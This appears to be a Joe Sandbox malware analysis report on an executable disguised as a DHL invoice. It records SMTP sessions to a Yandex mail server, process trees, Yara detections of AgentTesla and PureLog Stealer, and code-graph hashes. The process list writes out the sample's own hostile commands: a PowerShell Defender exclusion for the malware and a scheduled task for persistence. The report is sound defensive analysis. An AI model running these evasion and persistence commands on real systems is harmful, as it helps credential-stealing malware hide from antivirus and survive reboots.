                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:43.687733889 CET  50030  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:18:44.147063971 CET  587  50030  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:05.344616890 CET  587  50031  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-38.myt.yp-c.yandex.net Ok 1732731545-4JeFqd0OlKo0
                                                                                                                                Nov 27, 2024 19:19:05.350455046 CET  50031  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:05.806034088 CET  587  50031  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-38.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:05.806389093 CET  50031  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:19:06.259654045 CET  587  50031  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:14.631259918 CET  587  50032  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-69.iva.yp-c.yandex.net Ok 1732731554-EJejLW0OrGk0
                                                                                                                                Nov 27, 2024 19:19:14.634655952 CET  50032  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:15.086268902 CET  587  50032  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-69.iva.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:15.086508989 CET  50032  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:19:15.534303904 CET  587  50032  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:22.184061050 CET  587  50033  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1732731561-LJeMep0OdOs0
                                                                                                                                Nov 27, 2024 19:19:22.184243917 CET  50033  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:22.644680023 CET  587  50033  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:22.644833088 CET  50033  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:19:22.949794054 CET  587  50034  77.88.21.158  192.168.2.4  220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1732731562-MJeM5p0MnmI0
                                                                                                                                Nov 27, 2024 19:19:22.950483084 CET  50034  587  192.168.2.4  77.88.21.158  EHLO 928100
                                                                                                                                Nov 27, 2024 19:19:23.098561049 CET  587  50033  77.88.21.158  192.168.2.4  220 Go ahead
                                                                                                                                Nov 27, 2024 19:19:23.395632029 CET  587  50034  77.88.21.158  192.168.2.4  250-mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:19:23.395801067 CET  50034  587  192.168.2.4  77.88.21.158  STARTTLS
                                                                                                                                Nov 27, 2024 19:19:23.843940020 CET  587  50034  77.88.21.158  192.168.2.4  220 Go ahead

                                                                                                                                Target ID:0
                                                                                                                                Start time:13:15:10
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x6a0000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:13:15:12
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0xb70000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:13:15:12
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                                                                                                                                Imagebase:0xb70000
                                                                                                                                File size:433'152 bytes
                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"
                                                                                                                                Imagebase:0x8b0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x300000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                                                                                                                                Imagebase:0x470000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Target ID:10
                                                                                                                                Start time:13:15:13
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Imagebase:0xc40000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:11
                                                                                                                                Start time:13:15:16
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                File size:496'640 bytes
                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:12
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                                                                                                                                Imagebase:0x8b0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:13
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:14
                                                                                                                                Start time:13:15:18
                                                                                                                                Start date:27/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                                                                                                                                Imagebase:0xd40000
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5 hash:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4254539671.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Has exited:false


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:14.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:3.4%
                                                                                                                                  Total number of Nodes:175
                                                                                                                                  Total number of Limit Nodes:10

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq$<ov!$TJpq$Tekq$poq$xbnq
                                                                                                                                  • API String ID: 0-2107662943
                                                                                                                                  • Opcode ID: 20feae5ed2dc369b9ffbc5776b2577cf90dbe61c19be2ffaf92612381002a28e
                                                                                                                                  • Instruction ID: 0faeb2643e5e5d102afe9404b279bae9bbbd0b358f7f4c6c49bae60d33e843b7
                                                                                                                                  • Opcode Fuzzy Hash: 20feae5ed2dc369b9ffbc5776b2577cf90dbe61c19be2ffaf92612381002a28e
                                                                                                                                  • Instruction Fuzzy Hash: F4B2C675E00628CFDB54CF69C984AD9BBB2FF89304F1581E9E509AB265DB319E81CF40

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                                  • API String ID: 0-1079488684
                                                                                                                                  • Opcode ID: 65940b33a8f9fc26132a8011ff711a269caa5acd12c72229d956fbe6c81aaab7
                                                                                                                                  • Instruction ID: 35cabf3e94bb2f533999a0f0161379849c83716c61894009f86b6fb3afd93db4
                                                                                                                                  • Opcode Fuzzy Hash: 65940b33a8f9fc26132a8011ff711a269caa5acd12c72229d956fbe6c81aaab7
                                                                                                                                  • Instruction Fuzzy Hash: 01326D71E002588FDB58DF7CC8517AEBBF6AF84300F14856AD40AAB395DB349D45CBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJpq$Tekq$xbnq
                                                                                                                                  • API String ID: 0-3321955333
                                                                                                                                  • Opcode ID: ecf6f9a86f088d01e56fe89d94c8c3f01754047c65f3dd2ecada82211d8293b6
                                                                                                                                  • Instruction ID: ac120925afed040bdfebfe496e3e022f63b7f6d12d184d0ecae96e0b7ced1e46
                                                                                                                                  • Opcode Fuzzy Hash: ecf6f9a86f088d01e56fe89d94c8c3f01754047c65f3dd2ecada82211d8293b6
                                                                                                                                  • Instruction Fuzzy Hash: 13B17375E006288FDB58CF6AC944ADDBBF2BF88301F14C0A9D909AB365DB345A858F50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: a0b0ac645e33f9ebf6485bed2eaf6db2c3d5100b9af382fc39b236a407c87769
                                                                                                                                  • Instruction ID: 79a193afcbddc0f13acf1b9e4640d99003d44f48f16bb6fcd81f819f1d346a41
                                                                                                                                  • Opcode Fuzzy Hash: a0b0ac645e33f9ebf6485bed2eaf6db2c3d5100b9af382fc39b236a407c87769
                                                                                                                                  • Instruction Fuzzy Hash: 3EB16974E042499FDB04CFA9C8546EEFFF2BF8A310F14846AD855AB265DB349906CF24

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: f0c42bbdfacad30e3a047afe64857201480d579cfe78df3539d66bfd803cbcfc
                                                                                                                                  • Instruction ID: 07b4212add976d3d0b7670302b2a41fdfec3a9f99b88598d60e1309b6a0f96f9
                                                                                                                                  • Opcode Fuzzy Hash: f0c42bbdfacad30e3a047afe64857201480d579cfe78df3539d66bfd803cbcfc
                                                                                                                                  • Instruction Fuzzy Hash: ACB17A74E042499FDB04CFE9C8546EEFFF2AF8A300F18846AD855AB255DB349906CF24

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: e531eac8d530b9453d350e9ed0f73bdafccbd76f2180f8f3437fa217ae117813
                                                                                                                                  • Instruction ID: fb5d558ee2e71abc70e6e054b0ad95691242fc8ab2b203fa1b9a75067402299b
                                                                                                                                  • Opcode Fuzzy Hash: e531eac8d530b9453d350e9ed0f73bdafccbd76f2180f8f3437fa217ae117813
                                                                                                                                  • Instruction Fuzzy Hash: 7391D6B4E012099FDB04CFA9C9906AEFBB2FF89300F14942AD519BB354D7355901CF64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e4aafc4dc287c8091df21fae6e1f7be830e364ec25ded23b5bee381e4eaac95d
                                                                                                                                  • Instruction ID: c49e42808143d71994b34986200f4db551fa119084fdc116c34aadb71c6685d4
                                                                                                                                  • Opcode Fuzzy Hash: e4aafc4dc287c8091df21fae6e1f7be830e364ec25ded23b5bee381e4eaac95d
                                                                                                                                  • Instruction Fuzzy Hash: 9BF1D174D05246DFCB08CFA9C4958AEFFB2FF89300B549499C452AB215DB34EA86CF90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90894d5ae96a0711f2876f895329f816040a955800b8493d007b809d184c7eaa
                                                                                                                                  • Instruction ID: 74d9f44e1acfed3edb4f9a1e68b33e30712fc1d8d79b90fb6f71acf9c78894ae
                                                                                                                                  • Opcode Fuzzy Hash: 90894d5ae96a0711f2876f895329f816040a955800b8493d007b809d184c7eaa
                                                                                                                                  • Instruction Fuzzy Hash: 55C18C717016049FDB19EB7AC460BAAB7E6AF88704F54846DE14ACB390DB35E902CB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 1086 9718368-971838d call 9717f54 1089 97183a2-97183b2 1086->1089 1090 971838f-971839f 1086->1090 1093 97183b4-97183bc 1089->1093 1094 97183bd-9718434 CreateIconFromResourceEx 1089->1094 1093->1094 1095 9718436-971843c 1094->1095 1096 971843d-971845a 1094->1096 1095->1096
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID: epU
                                                                                                                                  • API String ID: 3668623891-3012472399
                                                                                                                                  APIs
